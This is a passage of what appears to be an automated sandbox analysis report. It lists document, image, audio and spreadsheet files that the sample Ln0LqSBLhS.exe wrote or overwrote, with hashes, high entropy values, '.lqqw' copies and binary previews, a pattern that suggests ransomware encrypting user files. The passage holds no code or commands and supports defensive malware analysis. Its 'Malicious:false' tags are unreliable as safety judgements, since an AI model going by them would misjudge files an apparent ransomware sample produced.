                                                                                                                                                                                                    SHA-512:8C07BC51FD96D7E4E429EE1DDDC263428F4CD0C3EAA2C9FC83EF4077F7B02A940A16D20F1CF019AA989896ECB1619F28C65BA5D27EDFEBF4DBA9254D7604ABDF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: H4.._.&~.y....... z.A_.q.....U.......z...ZIPn..9...w. ....y8.*..x....;|....n..V0N.d.....X>..;.....UvE8U.. .....T...aZ...k|c....p..{.{.:.s?:...7q.)c.>c....m..[@...A#....J%.&.r...iQ#..".>.d.b.uA......._.e.Tg.]h.OLx/O.).VUt:...+..=rW...d.3...\....ex..E%X..n.jL.5...s-..s.k...I...yt..B.r...'9..._....@u...Wi..V.r.....b..s[5I?......Z...+.Y...5..om.~.wx....P...Kc..Z.....X.O..~....]..6.@.9.tI.Q_4...,....9..Z[....:jn4OZme.4$I.....ue5.z...d.u".O...........C..........4..b...8.}....wsL..s..3j...r~...iA..1......Z.U...#..&..]..mv.H_...G....:...#...W|<.86ef&.a...[...]=K....H.Y..s.G.....?(.1q.8....r;T...3..?...TK...+~$...{..ru?...x....UJY$8.l.N....H.}.B............_..{.E_...csmz..B....@.8.....M...).F.Vu...^C!.....|..[...C..h.b...?J..zd..A..E^.9...Q...Q.e......jL...[e..im'}..jA>z]..k...8F.I..tA.).`x.. ......M.>..Py..V@......1o.Y.o.W....zK"..R..f$..+..&..eo..@./...3.L.-.....l,h....-~....LSD.......L; :a..Eb..o4....(a.G/.#....q......F+k.Z..X.,[V..)..%..1.h...i.S..
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\DUUDTUBZFW.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8397512056805025
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:zCzcHdvQ3OC68EhoKi/1GYQpCySBrDMCXtUtW0JIItH7dyqIoQmTMAZNw/iFdRQW:SaI3J6bzi/1D4CFB0CXtCELoQmTbZ287
                                                                                                                                                                                                    MD5:2A553AE409A3352FA2F8FDD1AB2C0544
                                                                                                                                                                                                    SHA1:E58F412C050E54F97C5C2AAC5F54D2C62A72C170
                                                                                                                                                                                                    SHA-256:368F9BDAA053AB27E6FCF7CEFECA4ED9006F1F26482A1ACAC5AD3B1D6B3F0D8D
                                                                                                                                                                                                    SHA-512:8C07BC51FD96D7E4E429EE1DDDC263428F4CD0C3EAA2C9FC83EF4077F7B02A940A16D20F1CF019AA989896ECB1619F28C65BA5D27EDFEBF4DBA9254D7604ABDF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: H4.._.&~.y....... z.A_.q.....U.......z...ZIPn..9...w. ....y8.*..x....;|....n..V0N.d.....X>..;.....UvE8U.. .....T...aZ...k|c....p..{.{.:.s?:...7q.)c.>c....m..[@...A#....J%.&.r...iQ#..".>.d.b.uA......._.e.Tg.]h.OLx/O.).VUt:...+..=rW...d.3...\....ex..E%X..n.jL.5...s-..s.k...I...yt..B.r...'9..._....@u...Wi..V.r.....b..s[5I?......Z...+.Y...5..om.~.wx....P...Kc..Z.....X.O..~....]..6.@.9.tI.Q_4...,....9..Z[....:jn4OZme.4$I.....ue5.z...d.u".O...........C..........4..b...8.}....wsL..s..3j...r~...iA..1......Z.U...#..&..]..mv.H_...G....:...#...W|<.86ef&.a...[...]=K....H.Y..s.G.....?(.1q.8....r;T...3..?...TK...+~$...{..ru?...x....UJY$8.l.N....H.}.B............_..{.E_...csmz..B....@.8.....M...).F.Vu...^C!.....|..[...C..h.b...?J..zd..A..E^.9...Q...Q.e......jL...[e..im'}..jA>z]..k...8F.I..tA.).`x.. ......M.>..Py..V@......1o.Y.o.W....zK"..R..f$..+..&..eo..@./...3.L.-.....l,h....-~....LSD.......L; :a..Eb..o4....(a.G/.#....q......F+k.Z..X.,[V..)..%..1.h...i.S..
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\EIVQSAOTAQ.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847592697318683
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:oM9hYd7tFptVsovaaL6C6XFaOMYd0IJ0nIycDNYunSkfVP9nEsbD:ouOd7tFTVH76XFRd0IOnSN9SktFnEmD
                                                                                                                                                                                                    MD5:DDB637B765CE49E68E71D7F9C8D8D4F3
                                                                                                                                                                                                    SHA1:664B528292ED1081113E33AC9ACCCE5B9A3B3339
                                                                                                                                                                                                    SHA-256:ADA62BAF706970A7FF63C474293CB355D92E4D58D4F3BFD0A7A01B61123F99B8
                                                                                                                                                                                                    SHA-512:0B9FA71E18D688F0780CD7B077CAC72EEB05BBAAD0D1BB69C5B8B7179060EC8B5FF872F9448DFE815AAC954D0A9870B0C24107C4F97EA58B62866DA1D32BBA63
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ."............+.T"}...Nt.......Ht..+.6..l....sFs...v..s..*.k.j,.x....>.F(......_z/.r.f.R...>>P.L.............f.rD...y.!....*........3.-.3.2..`...N)..3....#(.O..l.@w.`Z..d..h.)..v.g..z...+.|.,@"...FJ.[);.....tS.$r.VV...AO.V0Vx.i..f.Q.-B..|R."#..s.;....[w}......k....?.;...i..wh.j...H.<.w....+./....G.~.v..kQ.|.m.mY...~.H.].....5..p......I...E...<.+I./Ee?..}...1:7...X..o...%..hT.z...0u....`......[.*.V_.*....k.-..GEK.c%13...%..v..\..6........x.C..D....4......>...U.........}....Z..*c<]..|...U.ow._...(4$.#.R.n.5..C\.J..d-e..h...Fcp.WR...Y..yU1.1a.....vi&}....C..lk..'.q........i..lD.`..^#o...HQ.<.....*..sw..`B<.....%.*..x..r.Af3..../]f.(W.lj......uh..5.].l..%....=4x......M!C.-..........Nk......lTV..md.[.+....*.E..IP....xnc...#......(1.M...j...S?Z....fJ."d.TcV...=9R.B...SI...D..G.6.5..3.Mh..b..+......-...).....$..Dn.'..)..a.AR..Rw...-k.S......U.#(\{.n...zI.....z.,xz'.vFR...\.vy...+h..3...q.10Y..X78.......R\../...t...7.q..JX4O.;."O.l../._.
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\EIVQSAOTAQ.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.847592697318683
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:oM9hYd7tFptVsovaaL6C6XFaOMYd0IJ0nIycDNYunSkfVP9nEsbD:ouOd7tFTVH76XFRd0IOnSN9SktFnEmD
                                                                                                                                                                                                    MD5:DDB637B765CE49E68E71D7F9C8D8D4F3
                                                                                                                                                                                                    SHA1:664B528292ED1081113E33AC9ACCCE5B9A3B3339
                                                                                                                                                                                                    SHA-256:ADA62BAF706970A7FF63C474293CB355D92E4D58D4F3BFD0A7A01B61123F99B8
                                                                                                                                                                                                    SHA-512:0B9FA71E18D688F0780CD7B077CAC72EEB05BBAAD0D1BB69C5B8B7179060EC8B5FF872F9448DFE815AAC954D0A9870B0C24107C4F97EA58B62866DA1D32BBA63
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ."............+.T"}...Nt.......Ht..+.6..l....sFs...v..s..*.k.j,.x....>.F(......_z/.r.f.R...>>P.L.............f.rD...y.!....*........3.-.3.2..`...N)..3....#(.O..l.@w.`Z..d..h.)..v.g..z...+.|.,@"...FJ.[);.....tS.$r.VV...AO.V0Vx.i..f.Q.-B..|R."#..s.;....[w}......k....?.;...i..wh.j...H.<.w....+./....G.~.v..kQ.|.m.mY...~.H.].....5..p......I...E...<.+I./Ee?..}...1:7...X..o...%..hT.z...0u....`......[.*.V_.*....k.-..GEK.c%13...%..v..\..6........x.C..D....4......>...U.........}....Z..*c<]..|...U.ow._...(4$.#.R.n.5..C\.J..d-e..h...Fcp.WR...Y..yU1.1a.....vi&}....C..lk..'.q........i..lD.`..^#o...HQ.<.....*..sw..`B<.....%.*..x..r.Af3..../]f.(W.lj......uh..5.].l..%....=4x......M!C.-..........Nk......lTV..md.[.+....*.E..IP....xnc...#......(1.M...j...S?Z....fJ."d.TcV...=9R.B...SI...D..G.6.5..3.Mh..b..+......-...).....$..Dn.'..)..a.AR..Rw...-k.S......U.#(\{.n...zI.....z.,xz'.vFR...\.vy...+h..3...q.10Y..X78.......R\../...t...7.q..JX4O.;."O.l../._.
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\EOWRVPQCCS.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.850124657190379
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:hCqZKT16ela2IVwrITixEP/I6zVc8zXOLBRyEQQ+8ldb9BHaUf/20YbD:hvZKhhcVbTiqHI66QOLBlQ4ld/6Uf/iD
                                                                                                                                                                                                    MD5:252FB1EC5018A127DAA24AD9DC770A00
                                                                                                                                                                                                    SHA1:1794BA053D299BD13FE4AA6D09718938A436E624
                                                                                                                                                                                                    SHA-256:D60554295A4A3054F3C893D99AD33170E84BC5AE713C9B60AB7313661855DD5A
                                                                                                                                                                                                    SHA-512:29595A56D0E63BF8BAEFEEDA7769BA01C3F2D10230DFCCA4F801BE30618126A7880F64BC09E6258E14E1AA8653D15321917E9541C76FDC87A76D9F663F480FBD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: :....K.b..o..u.~..^..{.gD.%0....yPR..X...l.0Y..e...]N.!....../.F..X...g...n...M#...... .-...8........<..fHi..q.Yv......")....c.w.'._..#..>..*.E..N-..!.S..uP8.w.[6...,.?".5H....B....}.......i.M...&.......O.K.L..."J....Jy..J..P...t~..b.`.F...G..J..RU.1[.@...m.r... viT.(...f............H3.R.>...Iu..c.U..K.W).....}.|.Y..i.......Z..]....J..rC..bK.]W.(5.-.....-.....?(PnK.h.d...3.&.._....as..~d....&......tS.....fK../...s'm.T.5..E...E).[.k-x...m:.Q?".....b.Hz?....p..Po......6V...'Y2x.....2...Unl...@w.W....g..m.....L@......#J.kU.`....D.5=..7....[..*..Z?)..!M.'.JC6...|..w..{...........yJ.bZ/J.zp6.4.(._}.....4z.".c_.....!V.....[..K7^K......@...`......A<..-Y...?C..#.s.6e......7.P.a'..- .l...^T..n....?wCP9.K.....)./.+..E*..k&u........0.V.;..q..S.4......s.....o.9.=.RH3...t...A."..YF.U.X.t./:H.0..CS.;dJ.:<..U.#.D\.....Y.(6.x..6.Mv.J%.t...H4y.....Ox@..9...O.:.^..zk.I...gdF.(....>.+Q..;...c.E..p..&.9Z.0R...uz.D.a.t.....a..o..........,.8.h..)....f.~s.Y!.
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\EOWRVPQCCS.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.850124657190379
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:hCqZKT16ela2IVwrITixEP/I6zVc8zXOLBRyEQQ+8ldb9BHaUf/20YbD:hvZKhhcVbTiqHI66QOLBlQ4ld/6Uf/iD
                                                                                                                                                                                                    MD5:252FB1EC5018A127DAA24AD9DC770A00
                                                                                                                                                                                                    SHA1:1794BA053D299BD13FE4AA6D09718938A436E624
                                                                                                                                                                                                    SHA-256:D60554295A4A3054F3C893D99AD33170E84BC5AE713C9B60AB7313661855DD5A
                                                                                                                                                                                                    SHA-512:29595A56D0E63BF8BAEFEEDA7769BA01C3F2D10230DFCCA4F801BE30618126A7880F64BC09E6258E14E1AA8653D15321917E9541C76FDC87A76D9F663F480FBD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: :....K.b..o..u.~..^..{.gD.%0....yPR..X...l.0Y..e...]N.!....../.F..X...g...n...M#...... .-...8........<..fHi..q.Yv......")....c.w.'._..#..>..*.E..N-..!.S..uP8.w.[6...,.?".5H....B....}.......i.M...&.......O.K.L..."J....Jy..J..P...t~..b.`.F...G..J..RU.1[.@...m.r... viT.(...f............H3.R.>...Iu..c.U..K.W).....}.|.Y..i.......Z..]....J..rC..bK.]W.(5.-.....-.....?(PnK.h.d...3.&.._....as..~d....&......tS.....fK../...s'm.T.5..E...E).[.k-x...m:.Q?".....b.Hz?....p..Po......6V...'Y2x.....2...Unl...@w.W....g..m.....L@......#J.kU.`....D.5=..7....[..*..Z?)..!M.'.JC6...|..w..{...........yJ.bZ/J.zp6.4.(._}.....4z.".c_.....!V.....[..K7^K......@...`......A<..-Y...?C..#.s.6e......7.P.a'..- .l...^T..n....?wCP9.K.....)./.+..E*..k&u........0.V.;..q..S.4......s.....o.9.=.RH3...t...A."..YF.U.X.t./:H.0..CS.;dJ.:<..U.#.D\.....Y.(6.x..6.Mv.J%.t...H4y.....Ox@..9...O.:.^..zk.I...gdF.(....>.+Q..;...c.E..p..&.9Z.0R...uz.D.a.t.....a..o..........,.8.h..)....f.~s.Y!.
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\PALRGUCVEH.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8512928115375455
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:FAskzpmq3KpzNL/i7uq0sGYSYdt1Yf2LPVXot95DTPwC4cK4WUNKVzwTCMTngZ80:FAh9ApzBi7uq7dSYdt1y2L6t95DMCy4s
                                                                                                                                                                                                    MD5:8E45BB4571A166CAE79D14B11CA60589
                                                                                                                                                                                                    SHA1:B7550F1FE5CC4FB10EA97DB58A9940A7C4C0C224
                                                                                                                                                                                                    SHA-256:1518ED3762402BFC8F59D1D846952044802FC87BAC9C0789B3FD936D2E5DE621
                                                                                                                                                                                                    SHA-512:8CB7EE0F40AD0A7E58C6E6C3615169FAD5577FCF89A24D1FE27781152325D1D67E2ED419F12809016126893084EEE64B99D4921DACDA3003BDD10FD1DA1CEA8F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .9..=7..... .._...hG..l......<S....o3x....._=...NI.X*.?lM....C..H...N........'..l..n1.".$^)..Mz..........aD?h.k..J.\...3,...x>.BQ$,.f|...H>.."..)<...86...$P.6..mU..........y....(V...cjg..q.w.>l.du..4&.....".D..Ne....8.....>....r..(..U.............`4.g.n,.oE.>|.....7S.t.A.#T.......tjK..&..f...5.%D!.g.KB0e.x.2.......U.C.4..bwCG.......~+..a.........(X.Y...yN..o.rQ...Mw..&.{~..r..SF..c.R.......B...:.~...c).5Z.... ..6.PfTI....AO...c........7*.g.J..3.H...Y:...g#..A4.4.........,.n.o..3XF..Y0.....*u6.2.~H.*|.49Y...K.u6........x...:`.Hs....e...4.......h....L@:....o~....Y.g..Z..2."].`...P!...%H....N1.d....*...kc.iy.h<...x.J.].l..~....X|...J...|e.......'.V..R.Z........GDwj?..BK....O...)....U...`%^*u.=....|"...6\.9.Wi...|...oR..,P.......4O.....,L...............e..L.P.#...Y^@...~I......5...L.......rp...c.%S.p.))...).....4.H._.x...B...Z2eoi...f!iB?".....+...&.d.b#.KD..r..._G..x...w..?.....v..L./#.B4|........3=1.y..........=.P.M)...l(O.0e.f.
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\PALRGUCVEH.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.8512928115375455
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:FAskzpmq3KpzNL/i7uq0sGYSYdt1Yf2LPVXot95DTPwC4cK4WUNKVzwTCMTngZ80:FAh9ApzBi7uq7dSYdt1y2L6t95DMCy4s
                                                                                                                                                                                                    MD5:8E45BB4571A166CAE79D14B11CA60589
                                                                                                                                                                                                    SHA1:B7550F1FE5CC4FB10EA97DB58A9940A7C4C0C224
                                                                                                                                                                                                    SHA-256:1518ED3762402BFC8F59D1D846952044802FC87BAC9C0789B3FD936D2E5DE621
                                                                                                                                                                                                    SHA-512:8CB7EE0F40AD0A7E58C6E6C3615169FAD5577FCF89A24D1FE27781152325D1D67E2ED419F12809016126893084EEE64B99D4921DACDA3003BDD10FD1DA1CEA8F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .9..=7..... .._...hG..l......<S....o3x....._=...NI.X*.?lM....C..H...N........'..l..n1.".$^)..Mz..........aD?h.k..J.\...3,...x>.BQ$,.f|...H>.."..)<...86...$P.6..mU..........y....(V...cjg..q.w.>l.du..4&.....".D..Ne....8.....>....r..(..U.............`4.g.n,.oE.>|.....7S.t.A.#T.......tjK..&..f...5.%D!.g.KB0e.x.2.......U.C.4..bwCG.......~+..a.........(X.Y...yN..o.rQ...Mw..&.{~..r..SF..c.R.......B...:.~...c).5Z.... ..6.PfTI....AO...c........7*.g.J..3.H...Y:...g#..A4.4.........,.n.o..3XF..Y0.....*u6.2.~H.*|.49Y...K.u6........x...:`.Hs....e...4.......h....L@:....o~....Y.g..Z..2."].`...P!...%H....N1.d....*...kc.iy.h<...x.J.].l..~....X|...J...|e.......'.V..R.Z........GDwj?..BK....O...)....U...`%^*u.=....|"...6\.9.Wi...|...oR..,P.......4O.....,L...............e..L.P.#...Y^@...~I......5...L.......rp...c.%S.p.))...).....4.H._.x...B...Z2eoi...f!iB?".....+...&.d.b#.KD..r..._G..x...w..?.....v..L./#.B4|........3=1.y..........=.P.M)...l(O.0e.f.
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\ZGGKNSUKOP.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.830394406093027
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:urZicXpfeNq5jWHAy0VCAYcLeHFMbjr7bjw2aLu56tGVT63psWTbD:hcXpfDWAy0UsLQFM/Lk2aLu0GVG3D
                                                                                                                                                                                                    MD5:69E43F61C6AF074B260E88DE65925081
                                                                                                                                                                                                    SHA1:9B7BD854AF43FC6BBA3ECFE215E9239A9D393B4F
                                                                                                                                                                                                    SHA-256:E3755179C43B83BFED4BC2C568FBE62DEE33E9D22AA46E2F246367AFA5ED2845
                                                                                                                                                                                                    SHA-512:1C2838A198094F6A0EC392AD18F8C6DE51926DAA414E269FE5650524DD8A5E3239CBBBB1E7AF9D858D28783C8C43A66EC18B2C0B93F4AE908C75A99335FC0592
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..%.q9e..ZN.G..&.......RW..tIblEtz.....m2\?.....$.<:.fj......X.J.f..-%...om.c.^D.....:...Q.....`.UVV....u....!.v7.z9....L:.....|Ytg]....p.hD6.j.].R.8.8..#|....\j.h).+..W.<.[....L.n..d.kw.}.:X.E...`.Z.[...@.o.t.......;...d5dd}..GXw.....V........J..K.n..b.\.....'..4.f..^}.+.7,...z!..Z.tA......L..l.P.K.|...up8...^....x.A..q..6I...k...|}...R..P.|[......A....T#....?K........7.0.d.c...2...z2..M...,...~A.T....x9=.>...N4Z&X.J..5....7XRhx....wP.....<@..4S.5gO.....!.7..4.3.s'....1..>.2rb.....<.{.i..|.ET/....k...._J.".,._..Tr ..kv'`d...~.S..5.v.CI.X8.w7.@&.................VM...S.....b...[..b..V(.O...O..'.K....Eh.S...9>.3....x..UD....|ClT......_.U_.B..Xz..51>t&..?...9q..`..~.m..N.......|......K.......#w.oeUqu'.p...Qm...P.~..-6oLO.?..Pb.;...B\q..q.*........].h.5.wSk..^1Z.s..G)").?Cf.i...cLD,....'.....D........#x....SB.Y....SG.%7..6.....&.>.._.sm..i....K.@.@..Wn....h.......1.....d8.z........8Tw[.?.I..(.{.3.1..`.|.%.i.~....[..so..0+..
                                                                                                                                                                                                    C:\Users\user\Documents\BJZFPPWAPT\ZGGKNSUKOP.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.830394406093027
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:urZicXpfeNq5jWHAy0VCAYcLeHFMbjr7bjw2aLu56tGVT63psWTbD:hcXpfDWAy0UsLQFM/Lk2aLu0GVG3D
                                                                                                                                                                                                    MD5:69E43F61C6AF074B260E88DE65925081
                                                                                                                                                                                                    SHA1:9B7BD854AF43FC6BBA3ECFE215E9239A9D393B4F
                                                                                                                                                                                                    SHA-256:E3755179C43B83BFED4BC2C568FBE62DEE33E9D22AA46E2F246367AFA5ED2845
                                                                                                                                                                                                    SHA-512:1C2838A198094F6A0EC392AD18F8C6DE51926DAA414E269FE5650524DD8A5E3239CBBBB1E7AF9D858D28783C8C43A66EC18B2C0B93F4AE908C75A99335FC0592
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..%.q9e..ZN.G..&.......RW..tIblEtz.....m2\?.....$.<:.fj......X.J.f..-%...om.c.^D.....:...Q.....`.UVV....u....!.v7.z9....L:.....|Ytg]....p.hD6.j.].R.8.8..#|....\j.h).+..W.<.[....L.n..d.kw.}.:X.E...`.Z.[...@.o.t.......;...d5dd}..GXw.....V........J..K.n..b.\.....'..4.f..^}.+.7,...z!..Z.tA......L..l.P.K.|...up8...^....x.A..q..6I...k...|}...R..P.|[......A....T#....?K........7.0.d.c...2...z2..M...,...~A.T....x9=.>...N4Z&X.J..5....7XRhx....wP.....<@..4S.5gO.....!.7..4.3.s'....1..>.2rb.....<.{.i..|.ET/....k...._J.".,._..Tr ..kv'`d...~.S..5.v.CI.X8.w7.@&.................VM...S.....b...[..b..V(.O...O..'.K....Eh.S...9>.3....x..UD....|ClT......_.U_.B..Xz..51>t&..?...9q..`..~.m..N.......|......K.......#w.oeUqu'.p...Qm...P.~..-6oLO.?..Pb.;...B\q..q.*........].h.5.wSk..^1Z.s..G)").?Cf.i...cLD,....'.....D........#x....SB.Y....SG.%7..6.....&.>.._.sm..i....K.@.@..Wn....h.......1.....d8.z........8Tw[.?.I..(.{.3.1..`.|.%.i.~....[..so..0+..
                                                                                                                                                                                                    C:\Users\user\Documents\CZQKSDDMWR.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.836128721632621
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:ML704iuS514vNhYTrDfwDFcPDt3sITTdOmHWAY8B9wjNckPUhkbD:MLI4iu214f8DfSF+J3pTpOf0Bujy4D
                                                                                                                                                                                                    MD5:E34EFC1CAA7D7434F43760FD3ED68970
                                                                                                                                                                                                    SHA1:127BB4B3A059E19070D92170C7DB2797AE9205D9
                                                                                                                                                                                                    SHA-256:FBE041B04233EEC714ACA97C891D912AEEE42CB1032315F08AEB09EBB1A99071
                                                                                                                                                                                                    SHA-512:80539B1FC6C2AF8DC1DD7EA7E70137838E6DE10D3027F125FBE6FD3F7286EB896704065E850A222143FBFC700637561E2694E539F450FF381769E4287C854778
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .E....9_I...A.i.cB.....F...[..U<>.;7..C.....a...2c/..TA.,+ ..w..v...._.1..Q..&.7Ev..st...V.68.l..?....T<..3......,#.P..S.......C...]..,y.X.A|...:_+...U.T.%i.S...bR9...`..!.....`.e..?...s..c5.+.....>P.`...C ...J..6`.&v......R..9ib.NU.`)...s...f...8..%..5'CP.......I.{x.)..7.......b!..a.>..#q..).}.=......g.3...C...Jbm.Aq..O.@l.@.rC...QHd.t.>.O...U.z..a*.n.o...HwG.2x.,..1A.....v.o[...b=..e...I{.7{h..Y..z.....7C..#.....#.............].....G..)....KF.......y...k,..,......p..Z.:.L..%.M=.7......?.._.Q.r...o%...P.j...R.}..g$;twD/b..I.@:.v.;v..CtX....i4...3......L.^.x..U..lL._Pt.r.\.Rkv........:E.c2.y.yq.d...k8....YN.<..>UM...ON5.....r....O..Em.c4$.FR..g<..].yX.Hj.@P.1:5..V8.SL.5......p...+Sn!.8.j.5.B...).!.S..yj...).nt.....J.&*........t. e).@0..IK...V....U|.../A../.....7..k.jD....t...c...&.....k:.....6..#..P...:.G$..2<.....fC...E...F..19f...o..2...k...-.=r(..Hn..x.L..T..%#.."..Qr......,....|.m....K.BN..Wq..s...4.3K&v.[..)1Vt.."+.]`......N..
                                                                                                                                                                                                    C:\Users\user\Documents\CZQKSDDMWR.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.836128721632621
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:ML704iuS514vNhYTrDfwDFcPDt3sITTdOmHWAY8B9wjNckPUhkbD:MLI4iu214f8DfSF+J3pTpOf0Bujy4D
                                                                                                                                                                                                    MD5:E34EFC1CAA7D7434F43760FD3ED68970
                                                                                                                                                                                                    SHA1:127BB4B3A059E19070D92170C7DB2797AE9205D9
                                                                                                                                                                                                    SHA-256:FBE041B04233EEC714ACA97C891D912AEEE42CB1032315F08AEB09EBB1A99071
                                                                                                                                                                                                    SHA-512:80539B1FC6C2AF8DC1DD7EA7E70137838E6DE10D3027F125FBE6FD3F7286EB896704065E850A222143FBFC700637561E2694E539F450FF381769E4287C854778
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .E....9_I...A.i.cB.....F...[..U<>.;7..C.....a...2c/..TA.,+ ..w..v...._.1..Q..&.7Ev..st...V.68.l..?....T<..3......,#.P..S.......C...]..,y.X.A|...:_+...U.T.%i.S...bR9...`..!.....`.e..?...s..c5.+.....>P.`...C ...J..6`.&v......R..9ib.NU.`)...s...f...8..%..5'CP.......I.{x.)..7.......b!..a.>..#q..).}.=......g.3...C...Jbm.Aq..O.@l.@.rC...QHd.t.>.O...U.z..a*.n.o...HwG.2x.,..1A.....v.o[...b=..e...I{.7{h..Y..z.....7C..#.....#.............].....G..)....KF.......y...k,..,......p..Z.:.L..%.M=.7......?.._.Q.r...o%...P.j...R.}..g$;twD/b..I.@:.v.;v..CtX....i4...3......L.^.x..U..lL._Pt.r.\.Rkv........:E.c2.y.yq.d...k8....YN.<..>UM...ON5.....r....O..Em.c4$.FR..g<..].yX.Hj.@P.1:5..V8.SL.5......p...+Sn!.8.j.5.B...).!.S..yj...).nt.....J.&*........t. e).@0..IK...V....U|.../A../.....7..k.jD....t...c...&.....k:.....6..#..P...:.G$..2<.....fC...E...F..19f...o..2...k...-.=r(..Hn..x.L..T..%#.."..Qr......,....|.m....K.BN..Wq..s...4.3K&v.[..)1Vt.."+.]`......N..
                                                                                                                                                                                                    C:\Users\user\Documents\DUUDTUBZFW.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.842995785559609
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:D8DYySAyRFZbs//BNLehV6+Z03hRRnlANSjfAwpiZvq7IhXBa482McBj7bD:D8DYy3oHY3nZRRlANSrXQBq7IhRMcpD
                                                                                                                                                                                                    MD5:056EE503C8B94028C3FDABD5DF0CB39C
                                                                                                                                                                                                    SHA1:31D92CC49B0F6E994BC53D9F98D68C6A6FA9CA74
